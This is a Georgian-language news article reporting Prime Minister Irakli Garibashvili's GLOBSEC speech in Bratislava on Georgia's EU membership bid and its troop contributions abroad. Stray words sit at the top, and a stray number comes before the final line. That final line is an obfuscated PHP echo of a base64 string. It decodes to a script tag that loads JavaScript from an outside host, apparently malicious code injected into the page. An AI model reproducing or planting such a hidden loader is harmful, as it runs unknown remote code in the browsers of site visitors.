celsiusi
ავერსი შნაიდერი
ჩვენ ყოველთვის ვიმყოფებით იქ, სადაც საერთაშორისო საზოგადოებას და ევროკავშირს ვჭირდებით, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა ბრატისლავაში, გლობალური უსაფრთხოების (GLOBSEC) ფორუმზე სიტყვით გამოსვლისას განაცხადა.
 
ღარიბაშვილის თქმით, საქართველო არ ითხოვს რაიმეს უფასოდ, საქართველო ითხოვს სამართლიან მოპყრობას.
 
„რამდენიმე სიტყვას მოგახსენებთ საქართველოს სურვილთან დაკავშირებით, რომ გახდეს ევროკავშირის წევრი. ჩვენ ვესაუბრებით ევროპელ მეგობრებს. ნათლად მინდა განვაცხადო, რომ საქართველო არ გახლავთ ქვეყანა, რომელიც ყოველთვის უფასოდ ითხოვს რაღაცას, ჩვენ ასევე წვლილი შეგვაქვს. მე რამდენიმე მაგალითს მოგიყვანთ. რამდენიმე წლის წინ მივიღეთ გადაწყვეტილება, გაგვეგზავნა ჯარები ცენტრალურ აფრიკის რესპუბლიკაში. ეს იყო რთული გადაწყვეტილება. ანუ საუბარია ევროკავშირის ხელმძღვანელობით ოპერაციაზე ცენტრალურ აფრიკის რესპუბლიკაში. ერთი 500-კაციანი ბატალიონი გავაგზავნეთ ცენტრალურ აფრიკის რესპუბლიკაში, რათა დავხმარებოდით ევროპელ მეგობრებს. ჩვენ ყოველთვის წვლილი შეგვაქვს და ყოველთვის იქ ვიმყოფებით, სადაც საერთაშორისო საზოგადოებას და ევროკავშირს ვჭირდებით.
 
რაც შეეხება ნატო-ს და ჩვენს მონაწილეობას ერაყსა და ავღანეთში. ჩვენ 2 000-კაციანი კონტინგენტი გვყავდა ამ ქვეყნებში. 35 ჩვენი გმირი მეომარი დაიღუპა გლობალური უსაფრთხოებისა და მშვიდობისთვის ბრძოლაში, 500-მდე მძიმედ დაიჭრა. ჩემი ბოლო კომენტარი გახლავთ ის, რომ საქართველო არ ითხოვს რაიმეს უფასოდ, ჩვენ ვითხოვთ სამართლიან მოპყრობას“, – განაცხადა ირაკლი ღარიბაშვილმა.
635
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");